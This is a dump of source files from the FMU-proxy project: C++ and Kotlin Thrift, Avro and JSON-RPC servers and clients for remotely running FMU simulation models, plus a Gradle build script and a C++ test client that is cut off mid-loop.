"avg_line_length": 20.215686798095703, "blob_id": "8261180a452d0a5d9423e6388312fec6984adc04", "content_id": "1df90c15ee3bab0931b6ffe942182faff845ef78", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 68, "num_lines": 51, "path": "/cpp/FMU-proxy/server/ThriftServer.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 08.06.18.\n//\n\n#ifndef FMU_PROXY_THRIFTSERVER_H\n#define FMU_PROXY_THRIFTSERVER_H\n\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/server/TSimpleServer.h>\n#include <thrift/transport/TServerSocket.h>\n#include <thrift/transport/TBufferTransports.h>\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/server/TSimpleServer.h>\n#include <thrift/transport/TServerSocket.h>\n#include <thrift/transport/TBufferTransports.h>\n\n#include \"../common/FmuWrapper.h\"\n#include \"FmuServiceHandler.h\"\n\n\nusing namespace ::apache::thrift;\nusing namespace ::apache::thrift::server;\nusing namespace ::apache::thrift::protocol;\nusing namespace ::apache::thrift::transport;\n\nnamespace fmuproxy {\n \n namespace server {\n \n class ThriftServer {\n\n private:\n shared_ptr<TSimpleServer> server;\n\n public:\n ThriftServer(std::shared_ptr<FmuWrapper> fmu, int port);\n \n void serve();\n \n void stop();\n\n };\n \n }\n \n}\n\n\n#endif //FMU_PROXY_THRIFTSERVER_H\n" }, { "alpha_fraction": 0.6620352864265442, "alphanum_fraction": 0.6634122133255005, "avg_line_length": 37.59903335571289, "blob_id": "23e3d135e78e60093c1ec29e982299fa56073920", "content_id": "399e6cc7fac9181455ebaba561723349d43f2c65", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7989, "license_type": "permissive", "max_line_length": 96, "num_lines": 207, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/JsonRpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcParams\nimport info.laht.yajrpc.net.RpcClient\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionImpl\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\n\nprivate const val SERVICE = \"FmuService\"\n\nclass JsonRpcFmuClient(\n val client: RpcClient\n): RpcFmuClient() {\n\n val fmiVersion: String by lazy {\n client.write(\"$SERVICE.getFmiVersion\")\n .getResult(String::class.java)!!\n }\n\n val modelName: String by lazy {\n client.write(\"$SERVICE.getModelName\")\n .getResult<String>()!!\n }\n\n val guid: String by lazy {\n client.write(\"$SERVICE.getGuid\")\n .getResult(String::class.java)!!\n }\n\n override val modelDescription: CommonModelDescription by lazy {\n client.write(\"$SERVICE.getModelDescription\")\n .getResult(ModelDescriptionImpl::class.java)!!\n }\n\n override val modelDescriptionXml: String by lazy {\n client.write(\"$SERVICE.getModelDescriptionXml\")\n .getResult(String::class.java)!!\n }\n\n /**\n * Terminates the FMU and closes the client connection\n */\n override fun close() {\n super.close()\n client.close()\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return client.write(\"$SERVICE.getGuid\", RpcParams.listParams(fmuId))\n .getResult<Boolean>()!!\n }\n\n override fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead {\n return client.write(\"$SERVICE.readInteger\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuIntegerRead>()!!\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n return client.write(\"$SERVICE.readInteger\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuIntegerArrayRead>()!!\n }\n\n override fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead {\n return client.write(\"$SERVICE.readReal\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuRealRead>()!!\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n return client.write(\"$SERVICE.readReal\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuRealArrayRead>()!!\n }\n\n override fun readString(fmuId: Int, vr: ValueReference): FmuStringRead {\n return client.write(\"$SERVICE.readString\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuStringRead>()!!\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n return client.write(\"$SERVICE.readString\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuStringArrayRead>()!!\n }\n\n override fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead {\n return client.write(\"$SERVICE.readBoolean\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuBooleanRead>()!!\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n return client.write(\"$SERVICE.readBoolean\", RpcParams.listParams(fmuId, vr))\n .getResult<FmuBooleanArrayRead>()!!\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return client.write(\"$SERVICE.writeInteger\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n return client.write(\"$SERVICE.bulkWriteInteger\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n return client.write(\"$SERVICE.writeReal\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n return client.write(\"$SERVICE.bulkWriteReal\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return client.write(\"$SERVICE.writeString\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n return client.write(\"$SERVICE.bulkWriteString\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return client.write(\"$SERVICE.writeBoolean\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n return client.write(\"$SERVICE.bulkWriteBoolean\", RpcParams.listParams(fmuId, vr, value))\n .getResult<FmiStatus>()!!\n }\n\n override fun getCurrentTime(fmuId: Int): Double {\n return client.write(\"$SERVICE.getCurrentTime\", RpcParams.listParams(fmuId))\n .getResult<Double>()!!\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n return client.write(\"$SERVICE.init\", RpcParams.listParams(fmuId, start))\n .getResult<FmiStatus>()!!\n }\n\n override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n return client.write(\"$SERVICE.step\", RpcParams.listParams(fmuId, stepSize))\n .getResult<StepResult>()!!.let { it.asPair() }\n }\n\n /**\n * Resets the FMU\n */\n override fun reset(fmuId: Int): FmiStatus {\n return client.write(\"$SERVICE.reset\", RpcParams.listParams(fmuId))\n .getResult<FmiStatus>()!!\n }\n\n /**\n * Terminates the FMU\n */\n override fun terminate(fmuId: Int): FmiStatus {\n return client.write(\"$SERVICE.terminate\", RpcParams.listParams(fmuId))\n .getResult<FmiStatus>()!!\n }\n\n override fun createInstanceFromCS(): ValueReference {\n return client.write(\"$SERVICE.createInstanceFromCS\")\n .getResult<ValueReference>()!!\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n return client.write(\"$SERVICE.createInstanceFromME\", RpcParams.listParams(solver))\n .getResult<ValueReference>()!!\n }\n\n internal class StepResult(\n var simulationTime: Double,\n var status: FmiStatus\n ) {\n fun asPair() = simulationTime to status\n }\n\n}" }, { "alpha_fraction": 0.5559006333351135, "alphanum_fraction": 0.5757763981819153, "avg_line_length": 21.33333396911621, "blob_id": "ab536c9421ea324b493bd03517c576089ad9e902", "content_id": "9f5361bf776d2c7894c7cd2d25804b0e8755a94b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1610, "license_type": "permissive", "max_line_length": 77, "num_lines": 72, "path": "/java/FMU-proxy/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nprintln \"Gradle version is ${GradleVersion.current().version}\"\n\nbuildscript {\n ext.kotlin_version = '1.2.41'\n\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath \"org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlin_version\"\n }\n}\n\nwrapper {\n gradleVersion = '4.7'\n}\n\next.fmi4j_stable_version = '0.7.1'\next.fmi4j_snapshot_version = '0.7.2-SNAPSHOT'\n\nsubprojects { sub ->\n\n apply plugin: 'java'\n\n sourceCompatibility = 1.8\n [compileJava, compileTestJava]*.options*.encoding = 'UTF-8'\n\n repositories {\n mavenCentral()\n maven {\n url \"https://oss.sonatype.org/content/repositories/snapshots/\"\n }\n }\n\n configurations.all {\n resolutionStrategy.cacheChangingModulesFor 0, 'seconds'\n }\n\n dependencies {\n\n sub.plugins.withId('kotlin') {\n compile \"org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlin_version\"\n }\n\n testImplementation('org.junit.jupiter:junit-jupiter-api:5.2.0')\n testImplementation('org.junit.jupiter:junit-jupiter-params:5.2.0')\n testRuntimeOnly('org.junit.jupiter:junit-jupiter-engine:5.2.0')\n\t\t\n }\n\n test {\n useJUnitPlatform()\n }\n \n sub.plugins.withId('kotlin') {\n compileKotlin {\n kotlinOptions {\n jvmTarget = \"1.8\"\n javaParameters = true\n freeCompilerArgs = ['-Xenable-jvm-default']\n }\n }\n\n compileTestKotlin {\n kotlinOptions {\n jvmTarget = \"1.8\"\n javaParameters = true\n }\n }\n }\n\n}\n\n" }, { "alpha_fraction": 0.7544625401496887, "alphanum_fraction": 0.7592225074768066, "avg_line_length": 38.40625, "blob_id": "a413098d96b090cda491ee710b14782727825f38", "content_id": "9ce05ab61d78c4904f592c02e345831e5a98d199", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2521, "license_type": "permissive", "max_line_length": 87, "num_lines": 64, "path": "/cpp/FMU-proxy/client/ThriftClient.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include <thrift/transport/TSocket.h>\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include \"../common/thrift-gen/FmuService.h\"\n#include \"../common/thrift-gen/definitions_types.h\"\n\n#include \"ThriftClient.h\"\n\nusing namespace std;\nusing namespace apache::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::client;\n\n::ThriftClient::ThriftClient(const char* host, int port) {\n shared_ptr<TTransport> socket(new TSocket(\"localhost\", 9090));\n transport = shared_ptr<TBufferedTransport>(new TBufferedTransport(socket));\n shared_ptr<TProtocol> protocol(new TBinaryProtocol(transport));\n this->client = shared_ptr<FmuServiceClient>(new FmuServiceClient(protocol));\n transport->open();\n}\n\nshared_ptr<ModelDescription> ThriftClient::getModelDescription() {\n if (!modelDescription) {\n modelDescription = shared_ptr<ModelDescription>(new ModelDescription());\n client->getModelDescription(*modelDescription);\n }\n return modelDescription;\n}\n\nshared_ptr<RemoteFmuInstance> ThriftClient::newInstance() {\n FmuId fmu_id = client->createInstanceFromCS();\n std::shared_ptr<RemoteFmuInstance> instance(new RemoteFmuInstance(fmu_id, client));\n return instance;\n}" }, { "alpha_fraction": 0.6655036807060242, "alphanum_fraction": 0.6674662232398987, "avg_line_length": 39.409690856933594, "blob_id": "250d87edf27c3f46223d19a7b2ec76e1c1f541c3", "content_id": "7cf8087d8f32c6c71dbdeac1fd3fef56cf1c6343", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 9172, "license_type": "permissive", "max_line_length": 103, "num_lines": 227, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/services/AvroFmuServiceImpl.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro.services\n\nimport no.mechatronics.sfi.fmi4j.common.ValueReference\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CoSimulationModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelExchangeModelDescription\nimport no.mechatronics.sfi.fmuproxy.avro.*\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nclass AvroFmuServiceImpl(\n private val fmu: Fmu\n): AvroFmuService {\n\n override fun getCurrentTime(fmuId: Int): Double {\n return Fmus.get(fmuId)?.let {\n it.currentTime\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun createInstanceFromCS(): Int {\n if (!fmu.supportsCoSimulation) {\n throw UnsupportedOperationException(\"FMU does not support CoSimulation!\")\n }\n return Fmus.put(fmu.asCoSimulationFmu().newInstance())\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n\n fun selectDefaultIntegrator(): FirstOrderIntegrator {\n val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n LOG.warn(\"No valid integrator found.. Defaulting to Euler with $stepSize stepSize\")\n return org.apache.commons.math3.ode.nonstiff.EulerIntegrator(stepSize)\n }\n\n val integrator = parseIntegrator(solver.name, solver.settings) ?: selectDefaultIntegrator()\n return Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator))\n\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return Fmus.get(fmuId)?.let {\n it.isTerminated\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun getModelDescriptionXml(): String {\n return fmu.modelDescriptionXml\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): Status {\n return Fmus.get(fmuId)?.let {\n it.init(start, stop)\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun step(fmuId: Int, step_size: Double): StepResult {\n return Fmus.get(fmuId)?.let {\n it.doStep(step_size)\n StepResult().apply {\n simulationTime = it.currentTime\n status = it.lastStatus.avroType()\n }\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun terminate(fmuId: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.terminate()\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun reset(fmuId: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.reset()\n it.lastStatus.avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun canGetAndSetFMUstate(fmuId: Int): Boolean {\n return Fmus.get(fmuId)?.let {\n val md = it.modelDescription\n when (md) {\n is CoSimulationModelDescription -> md.canGetAndSetFMUstate\n is ModelExchangeModelDescription -> md.canGetAndSetFMUstate\n else -> throw AssertionError(\"ModelDescription is not of type CS or ME?\")\n }\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n\n override fun getModelDescription(): ModelDescription {\n return fmu.modelDescription.avroType()\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeString(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readReal(fmuId: Int, vr: ValueReference): RealRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readReal(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<ValueReference>, value: List<Double>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeReal(vr.toIntArray(), value.toDoubleArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<ValueReference>): BooleanArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readBoolean(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<ValueReference>, value: List<String>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeString(vr.toIntArray(), value.toTypedArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeBoolean(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Double): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeReal(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeInteger(vr, value).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readString(fmuId: Int, vr: ValueReference): StringRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readString(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readBoolean(fmuId: Int, vr: ValueReference): BooleanRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readBoolean(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<ValueReference>, value: List<Int>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeInteger(vr.toIntArray(), value.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun readInteger(fmuId: Int, vr: ValueReference): IntegerRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readInteger(vr).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<ValueReference>): IntegerArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readInteger(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<ValueReference>): RealArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readReal(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<ValueReference>): StringArrayRead {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.readString(vr.toIntArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<ValueReference>, value: List<Boolean>): Status {\n return Fmus.get(fmuId)?.let {\n it.variableAccessor.writeBoolean(vr.toIntArray(), value.toBooleanArray()).avroType()\n } ?: throw NoSuchFmuException(\"No fmu with id=$fmuId\")\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(AvroFmuServiceImpl::class.java)\n }\n\n}" }, { "alpha_fraction": 0.7056108117103577, "alphanum_fraction": 0.7095170617103577, "avg_line_length": 35.11538314819336, "blob_id": "019af844e451cd7ad81b7ab88377260dd4e985ca", "content_id": "289bf6eab9b9d732536f04ab11100ec4b5cc30e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2816, "license_type": "permissive", "max_line_length": 94, "num_lines": 78, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/thrift/ThriftFmuServer.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.thrift\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.net.FmuProxyServer\nimport no.mechatronics.sfi.fmuproxy.thrift.services.ThriftFmuServiceImpl\nimport org.apache.thrift.server.TServer\nimport org.apache.thrift.server.TSimpleServer\nimport org.apache.thrift.transport.TServerSocket\nimport org.apache.thrift.transport.TServerTransport\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\n\nclass ThriftFmuServer(\n fmu: Fmu\n): FmuProxyServer {\n\n override var port: Int? = null\n override val simpleName = \"thrift/tcp\"\n\n private var server: TServer? = null\n private var serverTransport: TServerTransport? = null\n\n private val handler = ThriftFmuServiceImpl(fmu)\n private val processor = FmuService.Processor(handler)\n\n val isRunning: Boolean\n get() = server != null\n\n override fun start(port: Int) {\n if (!isRunning) {\n serverTransport = TServerSocket(port).also { this.port = port }\n server = TSimpleServer(TServer.Args(serverTransport).processor(processor)).apply {\n Thread { serve() }.start()\n }\n LOG.info(\"${javaClass.simpleName} listening for connections on port: $port\")\n } else {\n LOG.warn(\"${javaClass.simpleName} has already been started!\")\n }\n }\n\n override fun stop() {\n if (isRunning) {\n server!!.stop()\n server = null\n LOG.info(\"${javaClass.simpleName} stopped!\")\n }\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(ThriftFmuServer::class.java)\n }\n\n}" }, { "alpha_fraction": 0.6816028952598572, "alphanum_fraction": 0.6903460621833801, "avg_line_length": 32.88888931274414, "blob_id": "527f1a284a18d07eeba2d07c647288fad52c2ff5", "content_id": "b0d1d55775ae5185c8779b264ac9c6daa5301cb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2745, "license_type": "permissive", "max_line_length": 85, "num_lines": 81, "path": "/cpp/FMU-proxy/test/ThriftClientTest.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n#include <ctime>\n\n#include <thrift/protocol/TBinaryProtocol.h>\n#include <thrift/transport/TSocket.h>\n#include <thrift/transport/TTransportUtils.h>\n\n#include \"../common/thrift-gen/FmuService.h\"\n#include \"../common/thrift-gen/definitions_types.h\"\n\n#include \"../client/ThriftClient.h\"\n\nusing namespace std;\nusing namespace apache::thrift;\nusing namespace apache::thrift::protocol;\nusing namespace apache::thrift::transport;\n\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::client;\n\nconst double stop = 20;\nconst double step_size = 1E-4;\n\nint main() {\n\n try {\n\n ThriftClient client = ThriftClient(\"localhost\", 9090);\n\n shared_ptr<ModelDescription> modelDescription = client.getModelDescription();\n cout << \"GUID=\" << modelDescription->guid << endl;\n cout << \"modelName=\" << modelDescription->modelName << endl;\n cout << \"license=\" << modelDescription->license << endl;\n\n for (auto var : modelDescription->modelVariables) {\n cout << \"name= \" << var.name << endl;\n }\n\n shared_ptr<RemoteFmuInstance> instance = client.newInstance();\n instance->init(0.0, 0.0);\n\n RealRead read;\n StepResult result;\n while (result.simulationTime < 10) {\n instance->step(result, step_size);\n 